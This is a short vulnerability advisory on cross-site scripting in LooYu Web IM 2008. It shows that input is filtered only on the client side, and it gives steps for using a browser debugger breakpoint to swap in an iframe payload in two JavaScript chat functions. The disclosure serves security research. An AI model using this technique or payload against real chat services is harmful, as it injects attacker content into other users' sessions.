Application: LooYu Web IM
Vendor: www.looyu.com
Corporation: DuoYou, Inc.
Version: Latest: (19 SEP 2008) - Home Edition, Enterprise & Professional
Description: LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities

Background:
==============
LooYu is a web-based group chat tool that lets invite a client,
colleague, or vendor to chat, and collaborate.

Vulnerability:
==============
They do not properly sanitize the potentially malicious input content
to be rendered and, as a result, an attacker might provide malicious
HTML content as part of an IM message. There is a client-side only
input validation.

Exploit:
==============
1. newVisitorChat.js

(1)function sendMessage() {
    ..................
    ..................
    save_message(replaceHtml(msg));
}

(2)function save_message(msg) {
	var m = msg;                          //BREAKPOINT
	for(var e in emots){
    	if(m.indexOf(e)!=-1){    	
    		m = m.replace(e,emots[e]);       			
    	}

    }
    addMsg_chat(m, "you"/*getShortId(visitorId)*/, "visitor",null,'send');
    ..................
    ..................
}
SET BREAKPOINT(firebug, etc), AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"


2. newCusChat.js

(1)function sendMessage() {
    ..................
    ..................
    save_message(replaceHtml(msg));
    ..................
    ..................
 }

(2)function saveMessage(msg) {
     showLocalMessage(msg);
     Chat.addMessage(companyId,currentVisitor.chatId,customerId,currentVisitor.getTar(),
msg,{callback:function(m){
     save_message_do(currentVisitor,m);              //BREAKPOINT
     }});
    }
SET BREAKPOINT(firebug, etc), AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"

=========================
xisigr[topsec]
xisigr@gmail.com



-- 
----xisigr----